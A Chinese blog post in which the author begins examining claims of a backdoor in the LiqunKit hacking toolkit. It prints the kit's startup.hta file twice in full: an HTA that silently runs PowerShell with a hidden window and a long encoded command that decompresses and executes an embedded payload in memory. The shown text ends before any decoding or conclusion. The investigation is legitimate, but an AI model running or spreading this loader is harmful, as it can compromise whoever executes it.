记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

powershell 解码分析の测试(LiqunKit?) – vulsee.com

2021-11-30 20:51

起因

不知咋的,群里突然发了些LiqunKit带病毒的截图,然后开始说有后门,异常流量什么的鬼..

刚好前一秒上土司也看到了这工具,

项目地址 https://github.com/Liqunkit/LiqunKit_

———————————————————————————————–

感觉有后门不太科学..而群里的截图也都是截至拉到微步、VT上扫描的截图

都没啥鸟用,张口就来的感觉;本来开发者提供了redis等的利用模块,这黑客工具不是一直都被监控报毒的吗?

下面是文件目录:

作者提供的模块处理redis其他都是文本..然后一堆人都说工具有后门,比如

startup.hta

打开内容如下:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0AWgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUAZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQATgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=");</SCRIPT>

有人就喷:

 -nop -w hidden -encodedcommand 

我就特么想着还原一下不就知道了吗?况且你说人家有后门,就拿着微步/VT的结果嘟囔有啥鬼用?当然,万一有后门呢不是?

开始

原文:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0AWgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUAZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQATgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=");</SCRIPT>

